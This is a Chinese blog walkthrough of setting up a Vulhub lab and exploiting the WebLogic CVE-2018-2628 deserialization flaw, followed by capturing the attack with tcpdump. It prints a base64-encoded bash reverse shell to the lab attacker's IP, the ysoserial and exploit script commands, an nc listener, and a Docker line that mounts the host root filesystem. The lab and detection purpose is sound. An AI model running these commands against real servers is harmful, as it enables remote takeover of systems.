centos7.6查看什么进程跑的流量_使用Vulhub快速搭建攻防环境靶场+tcpdump实行流量监测...

于 2020-11-23 22:36:20 发布
阅读量122 收藏
点赞数
文章标签: centos7.6查看什么进程跑的流量 tcpdump 后台运行 tcpdump 监听多个端口 tcpdump安装

eb8bdc5d00fb4db2a3d3e7b3ef329a16.gif

文章作者:命运

前期准备

vmware workstation15

Ubuntu 18.04 192.168.50.157

kali linux  192.168.50.53

开始安装

vmware workstation15 安装方法如下

https://www.ainiseo.com/question/8170.html

Ubuntu 18.04  安装方法如下

https://zhuanlan.zhihu.com/p/38797088

docker 安装

apt-get install docker*

907145f90fdf7ad95fcdd3a4c8344e03.png

df374e4f56209e23f2ed03f587bf9ab7.png

安装git

apt-get install git

安装net-tools

apt-get install net-tools

安装成功后查看docker版本

7705ca8d8bd76498af7e9fd3980d646a.png

启动docker服务

service docker start

修改docker国内镜像源、我们这里使用阿里云源

创建或修改 /etc/docker/daemon.json 文件

{
"registry-mirrors": ["https://cr.console.aliyun.com"]
}
Docker中国区官方镜像 https://registry.docker-cn.com
网易 http://hub-mirror.c.163.com ustc
中国科技大学 https://docker.mirrors.ustc.edu.cn
阿里云容器  服务 https://cr.console.aliyun.com/

631e6128e82a132bc413f844f4294bdf.png

下载Vulhub靶场

wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip
unzip vulhub-master.zip
cd vulhub-master

此次我们使用weblogic反序列化漏洞、切换到/vulhub-master/weblogic/CVE-2018-2628

ff2a4b4facd5785cd3f7f6044fafb55a.png

使用docker-compose 下载vulhub下的靶场环境

docker-compose up -d

a799528b7c9f986a857c8547d495a5c0.png

使用docker ps 查看启动进程

906034ba010015e7f156baf07f486093.png

如果多个进程同时启动/停止/删除可以用下列命令(其余命令属于扩展)

docker start $(docker ps -qa)   #启动所有镜像
docker stop  $(docker ps -qa) #停止所有镜像
docker rmi  $(docker ps -qa)  #删除所以镜像
docker exec -it  id  /bin/bash #进入到一个docker shell下
docker export -o test.tar 54dc157b2982    #镜像打包 test.tar为你需要打包的文件名 54dc157b2982 为你需要打包的进程ID
cat test.tar | docker import - test_123 # 导入镜像包到本地
docker images #查看test_123是否导入成功
run -it -v /:/mnt --entrypoint /bin/bash ubuntu # 映射宿主机根目录到虚拟机/mnt下
docker push zhang0908/fudan-consumer1:v1  #将本地镜像上传到Docker Hub(或阿里云Hub)
docker pull hang0908/fudan-consumer1  #从Docker Hub(或阿里云Hub)、下载镜像到本地

在宿主机尝试访问weblogic后台

http://192.168.50.157:7001/console/login/LoginForm.jsp

7e1cdd07de3258974f7db2b67f56bacf.png

kali linux  安装方法

https://blog.csdn.net/qq_41625341/article/details/106152051

ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 工具下载编译

git clone https://github.com/brianwrf/ysoserial.git
cd ysoserial
mvn clean package -DskipTests

kali linux 默认没有安装mvn 安装方法非常简单方法如下

https://blog.csdn.net/weixin_44018338/article/details/98962529

漏洞利用

使用以下网址对Shell反弹编码转换、转换IP如下192.168.50.53:8888此地址进行转换

http://www.jackson-t.ca/runtime-exec-payloads.html

cbb03a45b422ce853897cef0d034cba4.png

复制地址

bash -c {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE5Mi4xNjguNTAuNTMvODg4OCAgMD4mMQ==}|{base64,-d}|{bash,-i}

切换到我们编译好的ysoserial目录下、执行下面代码来监听JRMP1099端口

bf3a15b249f45a8fa466e2bc45422666.png

下载https://www.exploit-db.com/exploits/44553exp脚本下载后重命名为exploit.py

然后通过运行exploit.py 脚本进行攻击获取服务器shell

运行exploit.py 向漏洞主机执行远程代码

python exploit.py  192.168.50.157 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 192.168.50.53 1099 JRMPClient

db60adbeb310a5e93d87fc592471ca7a.png

在Ubuntu下使用tcpdump -i ens33 -w weblogic.pcap 命令来检测攻击者使用的攻击脚本、执行的命令。

e0e12e3acafcefa395acfb9cbd96b8d8.png

返回kali linux 下用nc 监听8888 端口:

nc -lvnp 8888

f66c454e24cc2a1b1bf8f894364f0168.png

再次返回到Ubuntu系统下 按Ctrl+c 结束tcp抓包、对pcap数据包进行查看

b782e6acef5d6c85affc66fb0524d0e9.png

可以看到对方使用主机类型包括执行命令

3b86fac8bac1ee9bf29443643d52fdcb.png

3cf25d9c7461526f014b5d97ea0fa487.png

926eb3737393ec3364fb965c25517d81.png

至此结束、没什么技术含量大神勿喷。当然也可以把ens33上行接口做成流量镜像口、然后通过威胁态势感知平台来检测来自各个地方的攻击。

b18d75662d27494ef66807084e212cec.png

推荐文章++++

d0cd8f9cc9a346b29a70cb0eb37a1839.png

*漏洞靶场部署与镜像打包下载

*VulnHub系列-Lampiao 1.0靶场

*Docker 搭建 upload-labs 靶场

0c1a1b82c6e951dc9ddbf43a037ca915.png

b8660bcc862905d6df9082f9bf3bbb5b.gif

weixin_39742065
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值